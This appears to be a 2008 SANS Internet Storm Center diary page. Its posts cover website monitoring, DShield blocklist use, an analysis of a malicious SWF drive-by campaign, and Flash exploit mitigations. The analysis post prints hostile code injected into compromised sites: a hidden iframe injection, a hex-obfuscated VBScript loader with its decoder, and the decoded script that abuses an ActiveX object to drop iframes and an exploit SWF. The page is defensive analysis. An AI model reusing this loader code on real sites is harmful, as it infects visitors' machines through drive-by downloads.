Threat Level: green Handler on Duty: Rob VandenBrink

SANS ISC InfoSec Handlers Diary Blog

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

So, how do you monitor your website?

Published: 2008-05-28
Last Updated: 2008-05-28 23:58:44 UTC
by Jim Clausing (Version: 1)
0 comment(s)

With all the talk of SQL injections and XSS and such, and all of these malicious SWFs, I was conversing with one of our readers, Steve, today and figured I'd ask the rest of you for some advice.  Steve has a script that he uses to monitor his website for malicious content, but I was wondering, beyond the obvious of using Tripwire, AIDE, Samhain, Osiris, etc., what do you use to monitor your own websites?  Let us know via the contact page, and we'll summarize the results this weekend.

Keywords: So
0 comment(s)

Reminder: Proper use of DShield data

Published: 2008-05-28
Last Updated: 2008-05-28 21:04:35 UTC
by Johannes Ullrich (Version: 1)
2 comment(s)
Once in a while, we receive requests to remove an IP from our "blocklist", only to find out that the particular IP address isn't in our blocklist. Usually, it turns out that someone is using part of our DShield list in a way they are not supposed to be used.

DShield currently only publishes one blocklist: . It removes some of the obvious false positives. Of course, like with any block list, you should still use it at your own risk.

In addition, we are publishing the "Highly Predictive Blocklists" ( These blocklists are currently experimental, and a new version of the software should actually be release shortly.

Finally, there are a number of other "lists". For example, the following list is quite popular:

Note the big disclaimer at the top of this list:

# ipsascii.html

This list contains the top IPs, without any consideration to false positives.

Why don't we filter false positives?

Well, if it would be easy, we would do it. But first of all, DShield is a research tool. It has to provide consistent and complete data. In a particular case that came up today, a site was under DDoS attack. Our sensors picked up back scatter traffic and reported it to us. As a result, the site ended up in 'ipsascii.html'. I rather keep this type of activity in my database. Measuring backscatter is one thing we can do with our data. Another common false positive is P2P afterglow. But in case there is active scanning for P2P networks, we need to know what this afterglow looks like in order to substract it.

So again! stick to the recommended block lists. If you find an IP in our blocklist that shouldn't be there, let us know and we will remove it ASAP. But any raw data associated with the IP address will remain in our database. Finding an IP address in our database doesn't mean automatically that they are an "attacker" or "evil". To figure out what is happening, we need to look at the data in more detail.

Keywords: blocklist dshield
2 comment(s)

Another example of malicious SWF

Published: 2008-05-28
Last Updated: 2008-05-28 17:16:57 UTC
by Adrien de Beaupre (Version: 1)
0 comment(s)

Jerry wrote in to tell us of a new variant on the theme of SWF files
being found in the wild. This ones uses encoded VBScript to deliver.
A google search for gives us over 5,000 hits! The likely
method of getting the malcious scripts on these web servers is SQL
injection, check your code regularly.

So, let's take a look at this one:


Which contains:

if (navigator.systemLanguage=='zh-cn')
document.writeln("<iframe src=hxxp://
width=0 height=0></iframe>");

Downloading hxxp:// gives us the following:

<Script Language="VBScript">
Song = "3C536372697074204C616E67756167653D56425363726970743E0D0A094F6E204
Function Hex2Str(ByVal Ans):For i = 1 To Len(Ans)
Step 2:If IsNumeric(Mid(Ans, i, 1)) Then:tmpStr = tmpStr &
Chr("&H" & Mid(Ans, i, 2)):Else:tmpStr = tmpStr & Chr("&H" &
Mid(Ans, i, 4)):i = i + 2: End If: Next: Hex2Str = tmpStr: End Function
Document.Write Hex2Str(Song)
<script language="javascript"

This decodes using hex to string:

<Script Language=VBScript>
        On Error Resume Next
        Set Ob = Document.CreateElement("object")
        Ob.SetAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
        Set Pop = Ob.Createobject("Adodb.Stream","")
        If Not Err.Number = 0 then
                Document.write ("<embed src=\"flash.swf\"></embed>")
                Document.write ("<iFrame sRc=real.htm width=0 height=0></ifrAmE>
                Document.write ("<iFrame sRc=new.htm width=0 height=0></ifrAmE>"
                Document.write ("<iFrame sRc=help.htm width=0 height=0></ifrAmE>
        End If

Lets get  hxxp://
Which gives us:

file flash.swf
flash.swf: Macromedia Flash data, version 9

swfdump flash.swf
[HEADER]        File version: 9
[HEADER]        File size: 858
[HEADER]        Frame rate: 12.000000
[HEADER]        Frame count: 771
[HEADER]        Movie width: 550.00
[HEADER]        Movie height: 400.00
[045]         4 FILEATTRIBUTES
[006]       336 DEFINEBITS defines id 0682
==== Error: Unknown tag:0x056 ====
[056]        40 (null)
[009]         3 SETBACKGROUNDCOLOR (ff/ff/ff)
==== Error: Unknown tag:0x056 ====
[056]        12 (null)
==== Error: Unknown tag:0x052 ====
[052]       383 (null)
==== Error: Unknown tag:0x04c ====
[04c]        25 (null)
[001]         0 SHOWFRAME 1 (00:00:00,000)
[000]         0 END

Which looks familiar to us now.
real.htm, new.htm, help.htm are also quite interesting.

strings flash.swf shows us another possible malware location:
FWS     Z
flash.display   MovieClip

I munged the name of the file to pass language filters.
When I checked resolved to and didn't
want to give me the file.

Thanks again Bojan and Jeremy!

Adrien de Beaupré
Bell Canada, Professional Services

Keywords: malware swf
0 comment(s)

Followup to Flash/swf stories

Published: 2008-05-28
Last Updated: 2008-05-28 16:57:38 UTC
by Jim Clausing (Version: 2)
1 comment(s)

We've received quite a bit of mail about our stories yesterday about the malicious SWF files attempting to exploit older versions of the Adobe Flash player.  So, here are a few of the things that have come out of our discussions.

  1. Our friends over at (thanx, Steven) have a nice writeup that includes a bunch of domains they've noted that have the malicious SWF files.
  2. If you aren't sure which version of the flash player you are using, Adobe provides this page where you can check for yourself.
  3. On closer examination, this does not appear to be a "0-day exploit".  Symantec has updated their threatcon info, as well.  We have yet to see one of these that succeeds against the current version (, if you find one that does, please let us know via the contact page.
  4. It appears that this exploit may be included in the Chinese version of the MPack exploit toolkit (among others).
  5. In case we weren't clear about it earlier, it appears that the infected web sites check which browser you are using in addition to the flash player version to determine which exploit to deliver.

There are several ways to protect yourself even if you have a vulnerable version of the Flash player.

  • In Firefox, you can use either of the following add-ons, NoScript (one of our favorites, found here or here) or FlashBlock (here or here).
  • In IE, see here for how to set the "killbit", the CLSID is BD96C556-65A3-11D0-983A-00C04FC29E36.

Update: (2008-05-28-16:54UTC) I was remiss in not mentioning Dancho Danchev's writeup.

Keywords: flash swf
1 comment(s)

Podcast Episode Five has been released

Published: 2008-05-28
Last Updated: 2008-05-28 14:32:26 UTC
by Joel Esler (Version: 1)
0 comment(s)

Morning everyone,

Just a quick note to let everyone know that we put out Podcast Episode 5 this morning.  We had a special guest with us!  Larry Pesce of PaulDotCom Security Weekly!  The guys over at PaulDotCom do a great job, and we loved having Larry on the show!  Congradulations to Paul, as he is home with a new baby!

Don't forget the Live Podcast that we are doing at SANSFIRE on July 23rd at 8pm.

iTunes users, go here to subscribe.

Non-iTunes users, go here to download.



Joel Esler

Keywords: podcast
0 comment(s)
Diary Archives